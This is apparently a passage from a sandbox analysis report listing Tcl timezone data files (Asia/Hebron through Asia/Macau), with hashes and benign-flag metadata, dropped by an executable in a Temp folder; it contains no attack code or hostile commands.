                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Shanghai)]} {. LoadTimeZoneFile Asia/Shanghai.}.set TZData(:Asia/Harbin) $TZData(:Asia/Shanghai).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7939
                                                                                                                                                                                                                                                    Entropy (8bit):3.659150861905886
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Hebron) {. {-9223372036854775808 8423 0 LMT}. {-2185410023 7200 0 EET}. {-933645600 10800 1 EET}. {-857358000 7200 0 EET}. {-844300800 10800 1 EET}. {-825822000 7200 0 EET}. {-812685600 10800 1 EET}. {-794199600 7200 0 EET}. {-779853600 10800 1 EET}. {-762656400 7200 0 EET}. {-748310400 10800 1 EET}. {-731127600 7200 0 EET}. {-682653600 7200 0 EET}. {-399088800 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336790800 10800 1 EEST}. {-323654400 7200 0 EET}. {-305168400 10800 1 EEST}. {-292032000 7200 0 EET}. {-273632400 10800 1 EEST}. {-260496000 7200 0 EET}. {-242096400 10800 1 EEST}. {-228960000 7200 0 EET}. {-210560400 10800 1 EEST}. {-197424000 7200 0 EET}. {-178938000 10800 1 EEST}. {-165801600 7200 0 EET}. {-147402000 10800 1 EEST}. {-134265600 7200 0 EET}. {-115866000 10800 1 EE
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):381
                                                                                                                                                                                                                                                    Entropy (8bit):4.474832924192987
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ho_Chi_Minh) {. {-9223372036854775808 25600 0 LMT}. {-2004073600 25590 0 PLMT}. {-1851577590 25200 0 ICT}. {-852105600 28800 0 IDT}. {-782643600 32400 0 JST}. {-767869200 25200 0 ICT}. {-718095600 28800 0 IDT}. {-457776000 25200 0 ICT}. {-315648000 28800 0 IDT}. {171820800 25200 0 ICT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2150
                                                                                                                                                                                                                                                    Entropy (8bit):3.923186571913929
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Hong_Kong) {. {-9223372036854775808 27402 0 LMT}. {-2056693002 28800 0 HKT}. {-907389000 32400 1 HKST}. {-891667800 28800 0 HKT}. {-884246400 32400 0 JST}. {-766746000 28800 0 HKT}. {-747981000 32400 1 HKST}. {-728544600 28800 0 HKT}. {-717049800 32400 1 HKST}. {-694503000 28800 0 HKT}. {-683785800 32400 1 HKST}. {-668064600 28800 0 HKT}. {-654755400 32400 1 HKST}. {-636615000 28800 0 HKT}. {-623305800 32400 1 HKST}. {-605165400 28800 0 HKT}. {-591856200 32400 1 HKST}. {-573715800 28800 0 HKT}. {-559801800 32400 1 HKST}. {-542352600 28800 0 HKT}. {-528352200 32400 1 HKST}. {-510211800 28800 0 HKT}. {-498112200 32400 1 HKST}. {-478762200 28800 0 HKT}. {-466662600 32400 1 HKST}. {-446707800 28800 0 HKT}. {-435213000 32400 1 HKST}. {-415258200 28800 0 HKT}. {-403158600 32400 1 HKST}. {-383808600 28800 0 HKT}. {-371709000 32400 1 HKST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6665
                                                                                                                                                                                                                                                    Entropy (8bit):3.8069447053477594
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Hovd) {. {-9223372036854775808 21996 0 LMT}. {-2032927596 21600 0 HOVT}. {252439200 25200 0 HOVT}. {417978000 28800 1 HOVST}. {433785600 25200 0 HOVT}. {449600400 28800 1 HOVST}. {465321600 25200 0 HOVT}. {481050000 28800 1 HOVST}. {496771200 25200 0 HOVT}. {512499600 28800 1 HOVST}. {528220800 25200 0 HOVT}. {543949200 28800 1 HOVST}. {559670400 25200 0 HOVT}. {575398800 28800 1 HOVST}. {591120000 25200 0 HOVT}. {606848400 28800 1 HOVST}. {622569600 25200 0 HOVT}. {638298000 28800 1 HOVST}. {654624000 25200 0 HOVT}. {670352400 28800 1 HOVST}. {686073600 25200 0 HOVT}. {701802000 28800 1 HOVST}. {717523200 25200 0 HOVT}. {733251600 28800 1 HOVST}. {748972800 25200 0 HOVT}. {764701200 28800 1 HOVST}. {780422400 25200 0 HOVT}. {796150800 28800 1 HOVST}. {811872000 25200 0 HOVT}. {828205200 28800 1 HOVST}. {843926400 25200 0 HOVT}. {
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2122
                                                                                                                                                                                                                                                    Entropy (8bit):3.96053522561162
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Irkutsk) {. {-9223372036854775808 25025 0 LMT}. {-2840165825 25025 0 IMT}. {-1575874625 25200 0 IRKT}. {-1247554800 28800 0 IRKMMTT}. {354902400 32400 1 IRKST}. {370710000 28800 0 IRKT}. {386438400 32400 1 IRKST}. {402246000 28800 0 IRKT}. {417974400 32400 1 IRKST}. {433782000 28800 0 IRKT}. {449596800 32400 1 IRKST}. {465328800 28800 0 IRKT}. {481053600 32400 1 IRKST}. {496778400 28800 0 IRKT}. {512503200 32400 1 IRKST}. {528228000 28800 0 IRKT}. {543952800 32400 1 IRKST}. {559677600 28800 0 IRKT}. {575402400 32400 1 IRKST}. {591127200 28800 0 IRKT}. {606852000 32400 1 IRKST}. {622576800 28800 0 IRKT}. {638301600 32400 1 IRKST}. {654631200 28800 0 IRKT}. {670356000 25200 0 IRKMMTT}. {670359600 28800 1 IRKST}. {686084400 25200 0 IRKT}. {695761200 28800 0 IRKMMTT}. {701794800 32400 1 IRKST}. {717516000 28800 0 IRKT}. {733255200 32400
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):182
                                                                                                                                                                                                                                                    Entropy (8bit):4.853387718159342
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Istanbul)]} {. LoadTimeZoneFile Europe/Istanbul.}.set TZData(:Asia/Istanbul) $TZData(:Europe/Istanbul).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):350
                                                                                                                                                                                                                                                    Entropy (8bit):4.542050715764197
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Jakarta) {. {-9223372036854775808 25632 0 LMT}. {-3231299232 25632 0 BMT}. {-1451719200 26400 0 JAVT}. {-1172906400 27000 0 WIB}. {-876641400 32400 0 JST}. {-766054800 27000 0 WIB}. {-683883000 28800 0 WIB}. {-620812800 27000 0 WIB}. {-189415800 25200 0 WIB}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):204
                                                                                                                                                                                                                                                    Entropy (8bit):4.843450549897039
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Jayapura) {. {-9223372036854775808 33768 0 LMT}. {-1172913768 32400 0 WIT}. {-799491600 34200 0 ACST}. {-189423000 32400 0 WIT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7690
                                                                                                                                                                                                                                                    Entropy (8bit):3.684387169764595
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Jerusalem) {. {-9223372036854775808 8454 0 LMT}. {-2840149254 8440 0 JMT}. {-1641003640 7200 0 IST}. {-933645600 10800 1 IDT}. {-857358000 7200 0 IST}. {-844300800 10800 1 IDT}. {-825822000 7200 0 IST}. {-812685600 10800 1 IDT}. {-794199600 7200 0 IST}. {-779853600 10800 1 IDT}. {-762656400 7200 0 IST}. {-748310400 10800 1 IDT}. {-731127600 7200 0 IST}. {-681962400 14400 1 IDDT}. {-673243200 10800 1 IDT}. {-667962000 7200 0 IST}. {-652327200 10800 1 IDT}. {-636426000 7200 0 IST}. {-622087200 10800 1 IDT}. {-608947200 7200 0 IST}. {-591847200 10800 1 IDT}. {-572486400 7200 0 IST}. {-558576000 10800 1 IDT}. {-542851200 7200 0 IST}. {-527731200 10800 1 IDT}. {-514425600 7200 0 IST}. {-490845600 10800 1 IDT}. {-482986800 7200 0 IST}. {-459475200 10800 1 IDT}. {-451537200 7200 0 IST}. {-428551200 10800 1 IDT}. {-418262400 7200 0 IST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):171
                                                                                                                                                                                                                                                    Entropy (8bit):4.853601274352773
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kabul) {. {-9223372036854775808 16608 0 LMT}. {-2524538208 14400 0 AFT}. {-788932800 16200 0 AFT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2097
                                                                                                                                                                                                                                                    Entropy (8bit):3.9243582157859627
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kamchatka) {. {-9223372036854775808 38076 0 LMT}. {-1487759676 39600 0 PETT}. {-1247569200 43200 0 PETMMTT}. {354888000 46800 1 PETST}. {370695600 43200 0 PETT}. {386424000 46800 1 PETST}. {402231600 43200 0 PETT}. {417960000 46800 1 PETST}. {433767600 43200 0 PETT}. {449582400 46800 1 PETST}. {465314400 43200 0 PETT}. {481039200 46800 1 PETST}. {496764000 43200 0 PETT}. {512488800 46800 1 PETST}. {528213600 43200 0 PETT}. {543938400 46800 1 PETST}. {559663200 43200 0 PETT}. {575388000 46800 1 PETST}. {591112800 43200 0 PETT}. {606837600 46800 1 PETST}. {622562400 43200 0 PETT}. {638287200 46800 1 PETST}. {654616800 43200 0 PETT}. {670341600 39600 0 PETMMTT}. {670345200 43200 1 PETST}. {686070000 39600 0 PETT}. {695746800 43200 0 PETMMTT}. {701780400 46800 1 PETST}. {717501600 43200 0 PETT}. {733240800 46800 1 PETST}. {748965600 4320
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):436
                                                                                                                                                                                                                                                    Entropy (8bit):4.388322988460791
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Karachi) {. {-9223372036854775808 16092 0 LMT}. {-1988166492 19800 0 IST}. {-862637400 23400 1 IST}. {-764145000 19800 0 IST}. {-576135000 18000 0 KART}. {38775600 18000 0 PKT}. {1018119660 21600 1 PKST}. {1033840860 18000 0 PKT}. {1212260400 21600 1 PKST}. {1225476000 18000 0 PKT}. {1239735600 21600 1 PKST}. {1257012000 18000 0 PKT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):169
                                                                                                                                                                                                                                                    Entropy (8bit):4.920527043039276
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Urumqi)]} {. LoadTimeZoneFile Asia/Urumqi.}.set TZData(:Asia/Kashgar) $TZData(:Asia/Urumqi).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):174
                                                                                                                                                                                                                                                    Entropy (8bit):4.922860853700539
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kathmandu) {. {-9223372036854775808 20476 0 LMT}. {-1577943676 19800 0 IST}. {504901800 20700 0 NPT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                    Entropy (8bit):4.786408960928606
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Kathmandu)]} {. LoadTimeZoneFile Asia/Kathmandu.}.set TZData(:Asia/Katmandu) $TZData(:Asia/Kathmandu).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2156
                                                                                                                                                                                                                                                    Entropy (8bit):3.994799640059983
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Khandyga) {. {-9223372036854775808 32533 0 LMT}. {-1579424533 28800 0 YAKT}. {-1247558400 32400 0 YAKMMTT}. {354898800 36000 1 YAKST}. {370706400 32400 0 YAKT}. {386434800 36000 1 YAKST}. {402242400 32400 0 YAKT}. {417970800 36000 1 YAKST}. {433778400 32400 0 YAKT}. {449593200 36000 1 YAKST}. {465325200 32400 0 YAKT}. {481050000 36000 1 YAKST}. {496774800 32400 0 YAKT}. {512499600 36000 1 YAKST}. {528224400 32400 0 YAKT}. {543949200 36000 1 YAKST}. {559674000 32400 0 YAKT}. {575398800 36000 1 YAKST}. {591123600 32400 0 YAKT}. {606848400 36000 1 YAKST}. {622573200 32400 0 YAKT}. {638298000 36000 1 YAKST}. {654627600 32400 0 YAKT}. {670352400 28800 0 YAKMMTT}. {670356000 32400 1 YAKST}. {686080800 28800 0 YAKT}. {695757600 32400 0 YAKMMTT}. {701791200 36000 1 YAKST}. {717512400 32400 0 YAKT}. {733251600 36000 1 YAKST}. {748976400 32400
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):261
                                                                                                                                                                                                                                                    Entropy (8bit):4.664826781670047
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kolkata) {. {-9223372036854775808 21208 0 LMT}. {-2840162008 21200 0 HMT}. {-891582800 23400 0 BURT}. {-872058600 19800 0 IST}. {-862637400 23400 1 IST}. {-764145000 19800 0 IST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2096
                                                                                                                                                                                                                                                    Entropy (8bit):3.949583806985103
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Krasnoyarsk) {. {-9223372036854775808 22286 0 LMT}. {-1577513486 21600 0 KRAT}. {-1247551200 25200 0 KRAMMTT}. {354906000 28800 1 KRAST}. {370713600 25200 0 KRAT}. {386442000 28800 1 KRAST}. {402249600 25200 0 KRAT}. {417978000 28800 1 KRAST}. {433785600 25200 0 KRAT}. {449600400 28800 1 KRAST}. {465332400 25200 0 KRAT}. {481057200 28800 1 KRAST}. {496782000 25200 0 KRAT}. {512506800 28800 1 KRAST}. {528231600 25200 0 KRAT}. {543956400 28800 1 KRAST}. {559681200 25200 0 KRAT}. {575406000 28800 1 KRAST}. {591130800 25200 0 KRAT}. {606855600 28800 1 KRAST}. {622580400 25200 0 KRAT}. {638305200 28800 1 KRAST}. {654634800 25200 0 KRAT}. {670359600 21600 0 KRAMMTT}. {670363200 25200 1 KRAST}. {686088000 21600 0 KRAT}. {695764800 25200 0 KRAMMTT}. {701798400 28800 1 KRAST}. {717519600 25200 0 KRAT}. {733258800 28800 1 KRAST}. {748983600 25
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):360
                                                                                                                                                                                                                                                    Entropy (8bit):4.564891512259757
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kuala_Lumpur) {. {-9223372036854775808 24406 0 LMT}. {-2177477206 24925 0 SMT}. {-2038200925 25200 0 MALT}. {-1167634800 26400 1 MALST}. {-1073028000 26400 0 MALT}. {-894180000 27000 0 MALT}. {-879665400 32400 0 JST}. {-767005200 27000 0 MALT}. {378664200 28800 0 MYT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):703
                                                                                                                                                                                                                                                    Entropy (8bit):4.287678862773185
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Kuching) {. {-9223372036854775808 26480 0 LMT}. {-1383463280 27000 0 BORT}. {-1167636600 28800 0 BORT}. {-1082448000 30000 1 BORTST}. {-1074586800 28800 0 BORT}. {-1050825600 30000 1 BORTST}. {-1042964400 28800 0 BORT}. {-1019289600 30000 1 BORTST}. {-1011428400 28800 0 BORT}. {-987753600 30000 1 BORTST}. {-979892400 28800 0 BORT}. {-956217600 30000 1 BORTST}. {-948356400 28800 0 BORT}. {-924595200 30000 1 BORTST}. {-916734000 28800 0 BORT}. {-893059200 30000 1 BORTST}. {-885198000 28800 0 BORT}. {-879667200 32400 0 JST}. {-767005200 28800 0 BORT}. {378662400 28800 0 MYT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):168
                                                                                                                                                                                                                                                    Entropy (8bit):4.82804794783422
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8t1zVAIgNsM1E2WFKdQWFK81S:SlSWB9IZaM3yN1zVAIgaM1E2wKdQwK8c
                                                                                                                                                                                                                                                    MD5:6D6109F6EC1E12881C60EC44AAEB772B
                                                                                                                                                                                                                                                    SHA1:B5531BEAC1C07DA57A901D0A48F4E1AC03F07467
                                                                                                                                                                                                                                                    SHA-256:67BB9F159C752C744AC6AB26BBC0688CF4FA94C58C23B2B49B871CAA8774FC5D
                                                                                                                                                                                                                                                    SHA-512:B0624B9F936E5C1392B7EBB3190D7E97EAE96647AB965BB9BE045D2C3082B1C7E48FF89A7B57FD3475D018574E7294D45B068C555A43AAEDFD65AC5C5C5D0A5B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Riyadh)]} {. LoadTimeZoneFile Asia/Riyadh.}.set TZData(:Asia/Kuwait) $TZData(:Asia/Riyadh).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):164
                                                                                                                                                                                                                                                    Entropy (8bit):4.729350272507574
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8PpVAIgNz5YF2WFKf+WFKjn:SlSWB9IZaM3yxVAIgLYF2wKGwKjn
                                                                                                                                                                                                                                                    MD5:DB6155900D4556EE7B3089860AD5C4E3
                                                                                                                                                                                                                                                    SHA1:708E4AE427C8BAF589509F4330C389EE55C1D514
                                                                                                                                                                                                                                                    SHA-256:8264648CF1EA3E352E13482DE2ACE70B97FD37FBB1F28F70011561CFCBF533EA
                                                                                                                                                                                                                                                    SHA-512:941D52208FABB634BABCD602CD468F2235199813F4C1C5AB82A453E8C4CE4543C1CE3CBDB9D035DB039CFFDBC94D5D0F9D29363442E2458426BDD52ECDF7C3C5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Macau)]} {. LoadTimeZoneFile Asia/Macau.}.set TZData(:Asia/Macao) $TZData(:Asia/Macau).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1286
                                                                                                                                                                                                                                                    Entropy (8bit):3.979357479876244
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQ2eCXRr4zG7JG/UDzUUas7yAckSTcvZIItNnl2TtCjjz21z2:5oRr4y7o8DSlT+ln91
                                                                                                                                                                                                                                                    MD5:D5EAFB8BDD7331EE6152B1FA3C179492
                                                                                                                                                                                                                                                    SHA1:25AB37395DA05A828CFE545931C9EE0BBC47E4CD
                                                                                                                                                                                                                                                    SHA-256:432CC7EA35F46F1BC95F1863FBC540BD1B541BBFD1CE3FFC2DA404C1104E8596
                                                                                                                                                                                                                                                    SHA-512:F26B1FE6EB3561DBC01671452C72912C18AEE8AD34F49BD2F27E44C253F1A17EA1AE1B7E39EE0908272BF92F974CB84995885EBD271797AA492A33D3B42AABBE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Macau) {. {-9223372036854775808 27260 0 LMT}. {-1830411260 28800 0 MOT}. {-277360200 32400 1 MOST}. {-257405400 28800 0 MOT}. {-245910600 32400 1 MOST}. {-225955800 28800 0 MOT}. {-214473600 32400 1 MOST}. {-194506200 28800 0 MOT}. {-182406600 32400 1 MOST}. {-163056600 28800 0 MOT}. {-150969600 32400 1 MOST}. {-131619600 28800 0 MOT}. {-117088200 32400 1 MOST}. {-101367000 28800 0 MOT}. {-85638600 32400 1 MOST}. {-69312600 28800 0 MOT}. {-53584200 32400 1 MOST}. {-37863000 28800 0 MOT}. {-22134600 32400 1 MOST}. {-6413400 28800 0 MOT}. {9315000 32400 1 MOST}. {25036200 28800 0 MOT}. {40764600 32400 1 MOST}. {56485800 28800 0 MOT}. {72201600 32400 1 MOST}. {87922800 28800 0 MOT}. {103651200 32400 1 MOST}. {119977200 28800 0 MOT}. {135705600 32400 1 MOST}. {151439400 28800 0 MOT}. {167167800 32400 1 MOST}. {182889000 28800 0 MOT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2092
                                                                                                                                                                                                                                                    Entropy (8bit):3.9611945608474217
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQmech8vhOCTi7ZXltAtwGpd296ymXPO9UHxQdCHt/CXHmW9YbcINuC:5ZvhBiR8ld296yKPO9UHj1UGWgc4uC
                                                                                                                                                                                                                                                    MD5:E9010A0624F17201EDAE5BB52D16AF30
                                                                                                                                                                                                                                                    SHA1:9640299D919D53BA79D4A5BF3210A1AE3B22D0E8
                                                                                                                                                                                                                                                    SHA-256:BB2FE59341E7BAD597632202026DE2ECA73C78E5C08F659E78B6A9CC8CF1F1AF
                                                                                                                                                                                                                                                    SHA-512:347BE45C9309DE99130E1849B1BD1F58295196394600122730F2BC7D76A5FD40BBA758256B39B32CB983C2378AB028FF33F7FF06253753C50D2193F229A65748
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
